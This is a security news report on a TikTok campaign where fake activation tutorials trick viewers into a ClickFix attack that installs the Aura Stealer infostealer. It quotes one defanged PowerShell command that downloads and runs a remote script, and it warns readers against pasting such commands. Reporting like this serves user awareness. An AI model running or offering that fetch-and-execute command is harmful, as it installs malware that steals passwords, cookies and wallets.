Cybercriminals are now using TikTok to trick users into downloading malware by pretending to share free activation guides for popular software like Windows, Spotify, and Netflix.

These fake tutorials are part of a campaign discovered by ISC Handler Xavier Mertens, similar to one earlier reported by Trend Micro.

According to BleepingComputer, the videos appear to show step-by-step instructions on how to activate well-known software such as Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro, and Discord Nitro. Some even reference fake services like “Netflix Premium” or “Spotify Premium.”

The scam relies on a social engineering technique called a ClickFix attack. In this method, the video shows what looks like a simple fix and asks viewers to run a short PowerShell command as an administrator. For example, the command might look like:

iex (irm slmgr[.]win/photoshop)

The word “photoshop” in the URL changes depending on which software the video claims to activate. When the user runs the command, PowerShell connects to a remote site called slmgr[.]win and downloads another script.

That script then retrieves two executables hosted on Cloudflare Pages. The first file, updater.exe, is a variant of the Aura Stealer malware. This malicious program steals saved browser passwords, authentication cookies, cryptocurrency wallets, and login details from other apps, then sends them to the attackers.

A second file, source.exe, is also downloaded. It compiles and runs additional code in memory using Microsoft’s Visual C# Compiler, though its exact purpose is still unknown.

Anyone who has followed these fake guides should assume their credentials are compromised and immediately reset all passwords for online accounts.

ClickFix-style attacks have become increasingly common in the past year, often used to spread ransomware and cryptocurrency-stealing malware. To stay safe, users should never copy and run commands they see online in PowerShell, Command Prompt, File Explorer, or any system terminal, no matter how legitimate they look.